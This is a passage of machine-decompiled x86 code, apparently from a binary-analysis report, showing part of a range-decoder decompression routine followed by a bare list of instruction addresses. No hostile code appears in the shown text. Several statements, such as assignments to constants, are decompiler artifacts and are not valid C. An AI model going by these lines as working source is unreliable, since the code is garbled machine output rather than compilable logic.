								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

0x00000000
0x00406ca2
0x00406ca2
0x00406ca6
0x00406d5d
0x00406d60
0x00406d6c
0x00406c4d
0x00406c4d
0x00406c50
0x00406fc2
0x00406fc2
0x00406fc5
0x00406fc5
0x00406fcb
0x00406fd1
0x00406fd7
0x00406ff1
0x00406ff4
0x00406ffa
0x00407005
0x00407007
0x00406fd9
0x00406fd9
0x00406fe8
0x00406fec
0x00406fec
0x00407011
0x00407038
0x00407038
0x0040703e
0x0040703e
0x00000000
0x00407013
0x00407013
0x00407017
0x004071c6
0x00000000
0x004071c6
0x00407023
0x0040702a
0x00407032
0x00407035
0x00000000
0x00407035
0x00406cac
0x00406cb0
0x004071f1
0x004071f1
0x004071f4
0x004071f8
0x004071f8
0x00406cb6
0x00406cbc
0x00406cbf
0x00406cc3
0x00406cc6
0x00406cca
0x00407190
0x004071dc
0x004071e4
0x004071eb
0x004071ed
0x00000000
0x004071ed
0x00406cd0
0x00406cd3
0x00406cd9
0x00406cdb
0x00406cdb
0x00406cde
0x00406ce1
0x00406ce4
0x00406ce7
0x00406cea
0x00406ced
0x00406cee
0x00406cf0
0x00406cf0
0x00406cf0
0x00406cf3
0x00406cf6
0x00406cf9
0x00406cfc
0x00406cfc
0x00406cff
0x00406d01
0x00406d01
0x00406d04
0x00406d04
0x00406d04
0x004067da
0x004067da
0x004067e3
0x00000000
0x00000000
0x004067e9
0x00000000
0x004067f4
0x00000000
0x00000000
0x004067fd
0x00406800
0x00406803
0x00406807
0x00000000
0x00000000
0x0040680d
0x00406810
0x00406812
0x00406813
0x00406816
0x00406818
0x00406819
0x0040681b
0x0040681e
0x00406823
0x00406828
0x00406831
0x00406844
0x00406847
0x00406853
0x0040687b
0x0040687d
0x0040688b
0x0040688b
0x0040688f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040687f
0x0040687f
0x00406882
0x00406883
0x00406883
0x00000000
0x0040687f
0x00406859
0x0040685e
0x0040685e
0x00406867
0x0040686f
0x00406872
0x00000000
0x00406878
0x00406878
0x00000000
0x00406878
0x00000000
0x00406895
0x00406895
0x00406899
0x00407145
0x00000000
0x00407145
0x004068a2
0x004068b2
0x004068b5
0x004068b8
0x004068b8
0x004068b8
0x004068bb
0x004068bf
0x00000000
0x00000000
0x004068c1
0x004068c7
0x004068f1
0x004068f7
0x004068fe
0x00000000
0x004068fe
0x004068cd
0x004068d0
0x004068d5
0x004068d5
0x004068e0
0x004068e8
0x004068eb
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406930
0x00406936
0x00406939
0x00406946
0x0040694e
0x00000000
0x00000000
0x00406905
0x00406905
0x00406909
0x00407154
0x00000000
0x00407154
0x00406915
0x00406920
0x00406920
0x00406920
0x00406923
0x00406926
0x00406929
0x0040692e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406956
0x00406958
0x0040695b
0x004069cc
0x004069cf
0x004069d2
0x004069d9
0x004069e3
0x00000000
0x004069e3
0x0040695d
0x00406961
0x00406964
0x00406966
0x00406969
0x0040696c
0x0040696e
0x00406971
0x00406973
0x00406978
0x0040697b
0x0040697e
0x00406982
0x00406989
0x0040698c
0x00406993
0x00406997
0x0040699f
0x0040699f
0x0040699f
0x00406999
0x00406999
0x00406999
0x0040698e
0x0040698e
0x0040698e
0x004069a3
0x004069a6
0x004069c4
0x004069c6
0x00000000
0x004069a8
0x004069a8
0x004069ab
0x004069ae
0x004069b1
0x004069b3
0x004069b3
0x004069b3
0x004069b6
0x004069b9
0x004069bb
0x004069bc
0x004069bf
0x00000000
0x004069bf
0x00000000
